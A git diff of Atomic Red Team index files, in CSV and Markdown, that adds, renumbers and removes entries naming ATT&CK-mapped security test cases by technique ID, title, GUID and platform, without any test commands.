+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
 privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -808,10 +811,9 @@ persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Insta
 persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
 persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
 persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
-persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
-persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
-persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
-persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
+persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -995,6 +997,8 @@ persistence,T1546.015,Event Triggered Execution: Component Object Model Hijackin
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
 persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
@@ -1089,6 +1093,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Com
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
+collection,T1113,Screen Capture,10,RDP Bitmap Cache Extraction via bmc-tools,98f19852-7348-4f99-9e15-6ff4320464c7,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
@@ -1258,6 +1263,8 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,10,Copy NTDS in low level NTFS acquisition via MFT parsing,f57cb283-c131-4e2f-8a6c-363d575748b2,powershell
+credential-access,T1003.003,OS Credential Dumping: NTDS,11,Copy NTDS in low level NTFS acquisition via fsutil,c7be89f7-5d06-4321-9f90-8676a77e0502,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1329,6 +1336,8 @@ discovery,T1069.002,Permission Groups Discovery: Domain Groups,14,Active Directo
 discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt
 discovery,T1007,System Service Discovery,2,System Service Discovery - net.exe,5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3,command_prompt
 discovery,T1007,System Service Discovery,4,Get-Service Execution,51f17016-d8fa-4360-888a-df4bf92c4a04,command_prompt
+discovery,T1007,System Service Discovery,6,System Service Discovery - Windows Scheduled Tasks (schtasks),7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a,command_prompt
+discovery,T1007,System Service Discovery,7,System Service Discovery - Services Registry Enumeration,d70d82bd-bb00-4837-b146-b40d025551b2,powershell
 discovery,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 discovery,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
@@ -1406,7 +1415,8 @@ discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available
 discovery,T1083,File and Directory Discovery,9,Recursive Enumerate Files And Directories By Powershell,95a21323-770d-434c-80cd-6f6fbf7af432,powershell
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
-discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
+discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery via PowerShell (Process Mapping),b52c8233-8f71-4bd7-9928-49fec8215cf5,powershell
+discovery,T1049,System Network Connections Discovery,7,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
 discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
@@ -1497,6 +1507,7 @@ impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-49
 impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
 impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
 impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
+impact,T1496,Resource Hijacking,2,Windows - Simulate CPU Load with PowerShell,44315fb0-f78d-4cef-b10f-cf21c1fe2c75,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
 impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
@@ -1511,6 +1522,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1490,Inhibit System Recovery,10,Windows - vssadmin Resize Shadowstorage Volume,da558b07-69ae-41b9-b9d4-4d98154a7049,powershell
 impact,T1490,Inhibit System Recovery,11,Modify VSS Service Permissions,a4420f93-5386-4290-b780-f4f66abc7070,command_prompt
+impact,T1490,Inhibit System Recovery,13,Windows - Delete Volume Shadow Copies via Diskshadow,42111a6f-7e7f-482c-9b1b-3cfd090b999c,powershell
 impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
 impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
 impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
@@ -228,7 +228,7 @@
 - T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -348,7 +348,7 @@
 - T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -230,7 +230,7 @@
 - T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -351,7 +351,7 @@
 - T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.018 Event Triggered Execution: Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -54,6 +54,7 @@
 - [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -698,6 +699,7 @@
  - Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
  - Atomic Test #9: Snake Malware Encrypted crmlog file [windows]
  - Atomic Test #10: Execution from Compressed JScript File [windows]
+  - Atomic Test #11: Obfuscated PowerShell Command via Character Array [windows]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
@@ -770,6 +772,7 @@
  - Atomic Test #8: AWS CloudWatch Log Stream Deletes [iaas:aws]
  - Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
  - Atomic Test #10: GCP - Delete Activity Event Log [iaas:gcp]
+  - Atomic Test #11: AWS - Config Logs Disabled [iaas:aws]
 - [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
  - Atomic Test #1: Hidden Window [windows]
  - Atomic Test #2: Headless Browser Accessing Mockbin [windows]
@@ -1226,7 +1229,12 @@
  - Atomic Test #2: Add launch script to launch daemon [macos]
  - Atomic Test #3: Add launch script to launch agent [macos]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -1573,10 +1581,9 @@
  - Atomic Test #2: Modify Terminal Services DLL Path [windows]
 - [T1176 Browser Extensions](../../T1176/T1176.md)
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
-  - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
-  - Atomic Test #3: Firefox [linux, windows, macos]
-  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
-  - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
+  - Atomic Test #2: Firefox [linux, windows, macos]
+  - Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
+  - Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
@@ -1874,7 +1881,12 @@
  - Atomic Test #3: Add launch script to launch agent [macos]
 - T1671 Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1197 BITS Jobs](../../T1197/T1197.md)
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -2113,6 +2125,7 @@
  - Atomic Test #7: Windows Screencapture [windows]
  - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
  - Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
+  - Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
  - Atomic Test #1: Input Capture [windows]
@@ -2509,6 +2522,8 @@
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
+  - Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
+  - Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
@@ -2557,6 +2572,10 @@
  - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
 - [T1652 Device Driver Discovery](../../T1652/T1652.md)
  - Atomic Test #1: Device Driver Discovery [windows]
+  - Atomic Test #2: Device Driver Discovery (Linux) [linux]
+  - Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
+  - Atomic Test #4: List loaded kernel extensions (macOS) [macos]
+  - Atomic Test #5: Find Kernel Extensions (macOS) [macos]
 - [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
  - Atomic Test #1: Enumerate all accounts (Domain) [windows]
  - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
@@ -2624,6 +2643,10 @@
  - Atomic Test #2: System Service Discovery - net.exe [windows]
  - Atomic Test #3: System Service Discovery - systemctl/service [linux]
  - Atomic Test #4: Get-Service Execution [windows]
+  - Atomic Test #5: System Service Discovery - macOS launchctl [macos]
+  - Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
+  - Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
+  - Atomic Test #8: System Service Discovery - Linux init scripts [linux]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
  - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
@@ -2757,8 +2780,11 @@
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
-  - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
-  - Atomic Test #4: System Discovery using SharpView [windows]
+  - Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
+  - Atomic Test #4: System Network Connections Discovery via ss or lsof (Linux/MacOS) [linux, macos]
+  - Atomic Test #5: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
+  - Atomic Test #6: System Network Connections Discovery via sockstat (Linux, FreeBSD) [linux]
+  - Atomic Test #7: System Discovery using SharpView [windows]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
  - Atomic Test #1: AWS S3 Enumeration [iaas:aws]
@@ -3049,6 +3075,7 @@
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1496 Resource Hijacking](../../T1496/T1496.md)
  - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
+  - Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
 - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
  - Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
@@ -3071,6 +3098,7 @@
  - Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
  - Atomic Test #11: Modify VSS Service Permissions [windows]
  - Atomic Test #12: Disable Time Machine [macos]
+  - Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
 - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
  - Atomic Test #1: Shutdown System - Windows [windows]
@@ -13,6 +13,7 @@
 - [T1027.013 Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md)
  - Atomic Test #1: Decode Eicar File and Write to File [windows, macos, linux]
  - Atomic Test #2: Decrypt Eicar File and Write to File [windows, macos, linux]
+  - Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution [linux, macos]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -326,7 +327,9 @@
 - T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -411,8 +414,7 @@
 - T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
  - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
-  - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
-  - Atomic Test #3: Firefox [linux, windows, macos]
+  - Atomic Test #2: Firefox [linux, windows, macos]
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -464,7 +466,9 @@
 - T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -732,7 +736,9 @@
  - Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1652 Device Driver Discovery](../../T1652/T1652.md)
+  - Atomic Test #2: Device Driver Discovery (Linux) [linux]
+  - Atomic Test #3: Enumerate Kernel Driver Files (Linux) [linux]
 - [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
  - Atomic Test #23: Active Directory Domain Search [linux]
